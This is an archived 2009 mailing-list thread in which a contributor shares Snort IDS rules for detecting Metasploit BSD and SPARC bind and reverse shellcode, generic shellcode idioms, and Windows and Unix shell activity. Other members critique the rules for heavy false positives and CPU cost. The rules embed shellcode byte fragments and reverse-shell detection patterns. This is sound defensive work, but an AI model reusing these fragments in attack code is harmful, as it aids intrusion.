# 12 dirs  83.453.632.512 bytes free
# * dirs * bytes *
alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)

# 2 Dir(s)  37.604.442.112 bytes free
# * Dir(s) * bytes *
alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)


# 02/03/2009  23:51    <DIR>          masm32
# **/**/**** **:** <DIR> *
alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092; rev:1;)


# %systemroot%
alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73
79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1; nocase;)


# reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
alert tcp any any -> any any (msg:"ET Windows registry edit"; content:"reg ";
pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import|flags).*/";
nocase; sid:966600094; rev:1;)



#
# Unix shell
#

# command >&0 <--- write on std with non create pipe shellcode
alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)


#Unix bash user and root ($ and #).
#h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)

#Unix sh and pure bash ($ and #)
# sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)

-- 
Alberto Garcia de Dios.




> I agree with Joel and evilghost.  I'm guessing a lot of FPs,
> especially for binary data and encrypted (e.g. SSL) data.  Naked PCRE
> matches with no content will chew up megahertz like a fat kid eats
> cake.
>
> Thanks for the submission Alberto.  I think some of these will be
> useful after some refining.
>
> Mike Cox
>
> On 11/30/09, Joel Esler <eslerj at gmail.com> wrote:
>> These will false heavily, are extremely processor intensive....  etc..
>>
>> Personally, I don't like looking for Shellcode, but evilghost is right,
>> these will false like crazy.
>>
>> Plus, they are all "ip", have no flow.... etc.
>>
>> On Nov 30, 2009, at 1:31 PM, evilghost at packetmail.net wrote:
>>
>>> Some of these content matches are very short, I am curious to see what
>>> your false positive amount is, since many of these signatures do not
>>> have depth and offsets.  I'm afraid some of these, based on my sensor
>>> placement, may tend to false heavily.  Thank you for submitting these.
>>>
>>> Alberto Garcia de Dios wrote:
>>>> Hello, I share my snort rules.
>>>>
>>>> Metasploit patron ( all BSD and all filter for bsd type whitout generic
>>>> unix
>>>> shellcode ), my shellcodes patron and system patron.
>>>>
>>>> 75 new rules.
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> # Metasploit BSD shellcode detect rules by h0f - Jennylab
>>>> # Alberto Garcia de Dios
>>>> # albertogdedios at andaluciajunta.es
>>>> # http://www.jennylab.org
>>>>
>>>>
>>>>
>>>> #
>>>> #
>>>> #####
>>>> # METASPLOIT SHELLCODE RULES
>>>> #####
>>>> #
>>>> #
>>>>
>>>>
>>>> #
>>>> # BSD METASPLOIT RULES
>>>> #
>>>>
>>>>
>>>> #### BSD BIND SHELL #######
>>>> # BSD Bind Shell - ENCODE: PexFnstenvSub
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
>>>> classtype:shellcode-detect; sid:666001; rev:5;)
>>>>
>>>>
>>>> # BSD Bind Shell - ENCODE: CountDown
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e 7 e2 fa
>>>> 6b
>>>> 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect; sid:666003; rev:5;)
>>>> alert
>>>> ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
>>>> BSD
>>>> Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48 71
>>>> 74
>>>> 45 d3|"; classtype:shellcode-detect; sid:666004; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f
>>>> 77 45
>>>> 6a 69 63|"; classtype:shellcode-detect; sid:666005; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e
>>>> 20 2a
>>>> 2a cc a5|"; classtype:shellcode-detect; sid:666006; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
>>>> classtype:shellcode-detect; sid:666007; rev:5;)
>>>>
>>>>
>>>> #BSD Bind Shell - ENCODE: Pex
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
>>>> classtype:shellcode-detect; sid:666008; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
>>>> sid:666009; rev:5;)
>>>>
>>>>
>>>> #BSD Bind Shell - ENCODE: None
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
>>>> classtype:shellcode-detect; sid:666010; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53
>>>> 52 6a
>>>> 68 58 cd|"; classtype:shellcode-detect; sid:666011; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02
>>>> 59 6a
>>>> 5a 58 51|"; classtype:shellcode-detect; sid:666012; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f
>>>> 62 69
>>>> 6e 89 e3|"; classtype:shellcode-detect; sid:666013; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
>>>> classtype:shellcode-detect; sid:666014; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Bind Shell - ENCODE: PexAlphaNum
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49
>>>> 49 49
>>>> 51 5a 56|"; classtype:shellcode-detect; sid:666015; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30
>>>> 42 33
>>>> 30 42 43|"; classtype:shellcode-detect; sid:666016; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44
>>>> 54 42
>>>> 44 51 42|"; classtype:shellcode-detect; sid:666017; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c
>>>> 36
>>>> 41|"; classtype:shellcode-detect; sid:666018; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|";
>>>> classtype:shellcode-detect;
>>>> sid:666019; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Bind Shell - ENCODE: PexFstEnvMov
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
>>>> classtype:shellcode-detect; sid:666020; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>>>> sid:666021; rev:5;)
>>>>
>>>>
>>>> #BSD Bind Shell - ENCODE: JmpCallAditive
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8
>>>> ef ff
>>>> ff ff|"; classtype:shellcode-detect; sid:666022; rev:5;)
>>>>
>>>>
>>>> #BSD Bind Shell - ENCODE: Alpha2
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49
>>>> 49 49
>>>> 49 49 49|"; classtype:shellcode-detect; sid:666023; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
>>>> classtype:shellcode-detect; sid:666024; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|";
>>>> classtype:shellcode-detect;
>>>> sid:666025; rev:5;)
>>>> #### EOF BSD BIND SHELL ######
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> ### BSD REVERSE SHELL #######
>>>> #BSD Reverse Shell - ENCODE: PexFnstenvSub
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73
>>>> 13|";
>>>> classtype:shellcode-detect; sid:666026; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|83 eb fc e2 f4|";
>>>> classtype:shellcode-detect;
>>>> sid:666027; rev:5;)
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: Countdown
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07
>>>> e2 fa
>>>> 6b 63 5b 9d|"; classtype:shellcode-detect; sid:666028; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49
>>>> 26 7c
>>>> 96 7d 79 7e|"; classtype:shellcode-detect; sid:666029; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18
>>>> 5a 50
>>>> 54 b2 df 6d|"; classtype:shellcode-detect; sid:666030; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|";
>>>> classtype:shellcode-detect;
>>>> sid:666031; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: Pex
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76
>>>> 0e|";
>>>> classtype:shellcode-detect; sid:666032; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|83 ee fc e2 f4|";
>>>> classtype:shellcode-detect;
>>>> sid:666033; rev:5;)
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: None
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f
>>>> 62 69
>>>> 6e 89 e3 50|"; classtype:shellcode-detect; sid:666034; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
>>>> classtype:shellcode-detect; sid:666035; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a
>>>> 02 59
>>>> b0 5a 51 57|"; classtype:shellcode-detect; sid:666036; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: PexAlphaNum
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41
>>>> 4e 4f
>>>> 49 38 41 4e|"; classtype:shellcode-detect; sid:666037; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36
>>>> 44 56
>>>> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:666038; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41
>>>> 44 54
>>>> 42 44 51 42|"; classtype:shellcode-detect; sid:666039; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: PexFnstenvMov
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
>>>> classtype:shellcode-detect; sid:666040; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|83 eb fc e2 f4|";
>>>> classtype:shellcode-detect;
>>>> sid:666041; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: JmpCallAditive
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3
>>>> e8 ef
>>>> ff ff ff|"; classtype:shellcode-detect; sid:666042; rev:5;)
>>>>
>>>>
>>>>
>>>> #BSD Reverse Shell - ENCODE: Alpha2
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
>>>> classtype:shellcode-detect; sid:666043; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
>>>> classtype:shellcode-detect; sid:666044; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
>>>> classtype:shellcode-detect; sid:666045; rev:5;)
>>>> ##### EOF BSD Reverse Shell#####
>>>>
>>>>
>>>>
>>>>
>>>> ##### BSD SPARC Bind Shell #########
>>>> #BSD SPARC Bind Shell - ENCODE: SPARC
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea
>>>> 03 e0
>>>> 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666046; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12
>>>> bf ff
>>>> fb 9e 03 e0 04|"; classtype:shellcode-detect; sid:666047; rev:5;)
>>>>
>>>>
>>>> #BSD SPARC Bind Shell - ENCODE: None
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94
>>>> 10 20
>>>> 10 82 10 20 68|"; classtype:shellcode-detect; sid:666048; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82
>>>> 10 20
>>>> 6a 91 d0 20 08|"; classtype:shellcode-detect; sid:666049; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82
>>>> 10 20
>>>> 1e 91 d0 20 08|"; classtype:shellcode-detect; sid:666050; rev:5;)
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0
>>>> 3b bf
>>>> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:666051; rev:5;)
>>>> #### EOF BSD SPARC Bind Shell #########
>>>>
>>>>
>>>> ### BSD SPARC Reverse Shell ########
>>>> #BSD SPARC Reverse Shell - ENCODE: None
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01
>>>> 90 10
>>>> 20 02 82 10 20 61|"; classtype:shellcode-detect; sid:666052; rev:5;)
>>>> alert ip
>>>> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD
>>>> SPARC
>>>> Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2 60 01
>>>> 82
>>>> 10 20 5a|"; classtype:shellcode-detect; sid:666053; rev:5;) alert ip
>>>> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD
>>>> SPARC
>>>> Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f c0|";
>>>> classtype:shellcode-detect; sid:666054; rev:5;)
>>>>
>>>> #BSD SPARC Reverse Shell - ENCODE: SPARC
>>>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>>>> METASPLOIT:
>>>> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff
>>>> ea 03
>>>> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666055; rev:5;)
>>>> alert ip
>>>> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD
>>>> SPARC
>>>> Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff fb
>>>> 9e
>>>> 03 e0 04|"; classtype:shellcode-detect; sid:666056; rev:5;) #### EOF BSD
>>>> SPARC
>>>> Reverse Shell ####
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> #
>>>> ### Shellcode develop patron by h0f JennyLab
>>>> # Alberto Garcia de Dios
>>>> # albertogdedios at andaluciajunta.es
>>>>
>>>>
>>>> # Alpha payload
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
>>>> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
>>>> classtype:shellcode-detect; sid:666900; rev:5; nocase;)
>>>>
>>>>
>>>>
>>>>
>>>> # Call payload label and pop next bytes.
>>>>  #jmp short loader
>>>>  #label:
>>>>  #      code here
>>>>  #loader:
>>>>  # call label <--- here
>>>>  # db '/bin/bash'
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
>>>> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
>>>> classtype:shellcode-detect; sid:666901; rev:5; nocase;)
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> # xor eax, eax | xor ebx, ebx
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor
>>>> detect";
>>>> content:"|31 c0 31 db|"; classtype:shellcode-detect; sid:666902; rev:5;
>>>> nocase;)
>>>>
>>>>
>>>>
>>>> # mov al, 0x01 | int 0x80
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit
>>>> syscall";
>>>> content:"|b0 01 cd 80|"; classtype:shellcode-detect; sid:666903; rev:5;
>>>> nocase;)
>>>>
>>>>
>>>>
>>>> # pop ebx on call returned and two interruptions in 60 bytes.
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop
>>>> and
>>>> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
>>>> within:60; classtype:shellcode-detect; sid:666904; rev:5; nocase;)
>>>>
>>>>
>>>> # pop ecx to use in interruption and before jmp to label data loader #
>>>> VMWare
>>>> 2 server ( 8088 default port ) false positive.
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx
>>>> and
>>>> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
>>>> within:512; classtype:shellcode-detect; sid:666905; rev:5; nocase;)
>>>>
>>>>
>>>> # three push ( bsd shellcodes use very match push ) | very much false
>>>> positive
>>>> on ssh and other services. use !$SSH_PORT ( before define var ).
>>>> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
>>>> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|";
>>>> within:12;
>>>> classtype:shellcode-detect; sid:666906; rev:5; nocase;)
>>>>
>>>>
>>>> # xor all regs
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
>>>> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
>>>> content:"|31 d2|"; distance:1; classtype:shellcode-detect; sid:666907;
>>>> rev:5;
>>>> nocase;)
>>>>
>>>>
>>>>
>>>> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop (
>>>> multiple
>>>> exploits use).
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of
>>>> seh
>>>> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
>>>> sid:666908; rev:5; nocase;)
>>>>
>>>>
>>>> # movl $0x01, %al | int 0x91
>>>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit
>>>> Solaris.";
>>>> content:"|b0 01 cd 91|"; classtype:shellcode-detect; sid:666908; rev:5;
>>>> nocase;)
>>>>
>>>>
>>>>
>>>> #
>>>> # WINDOWS SHELL
>>>> #
>>>>
>>>> # C:\masm32> or C:\>
>>>> # *:\*>
>>>> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
>>>> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
>>>> # \w\:\\.*\>
>>>> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
>>>> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
>>>>
>>>>
>>>> # 12 dirs  83.453.632.512 bytes free
>>>> # * dirs * bytes *
>>>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
>>>> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
>>>>
>>>> # 2 Dir(s)  37.604.442.112 bytes free
>>>> # * Dir(s) * bytes *
>>>> # The tablet pc and other?? i dont know
>>>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
>>>> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
>>>>
>>>>
>>>> # 02/03/2009  23:51    <DIR>          masm32
>>>> # **/**/**** **:** <DIR> *
>>>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
>>>> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092;
>>>> rev:1;)
>>>>
>>>>
>>>> # %systemroot%
>>>> alert tcp any any -> any any (msg:"ET Windows systemroot var";
>>>> content:"|25 73
>>>> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1;)
>>>>
>>>>
>>>> # reg
>>>> (query|add|delete|copy|save|restore|load|unload|compare|export|import)
>>>> alert tcp any any -> any any (msg:"ET Windows registry edit";
>>>> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import).*/";
>>>> sid:966600094; rev:1;)
>>>>
>>>>
>>>>
>>>> #
>>>> # Unix shell
>>>> #
>>>>
>>>> # comand >&0 <--- write on std with non create pipe shellcode
>>>> alert tcp any any -> any any (msg:"ET Unix write out on std posible
>>>> reverse
>>>> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
>>>>
>>>>
>>>> #Unix bash user and root ($ and #).
>>>> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
>>>> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
>>>> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
>>>>
>>>> #Unix sh and pure bash ($ and #)
>>>> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
>>>> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
>>>> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



From evilghost at packetmail.net  Tue Dec  1 09:35:14 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Tue, 1 Dec 2009 08:35:14 -0600
Subject: [Emerging-Sigs] jennylab.rules
In-Reply-To: <51334.10.160.5.67.1259676149.squirrel@correo.andaluciajunta.es>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>	<4B140F94.6000604@packetmail.net>	<BEC67188-494F-4BED-994D-7640414E2992@gmail.com>	<6116b9e20911301101n26d6b64bk8d71ce557ac8397d@mail.gmail.com>
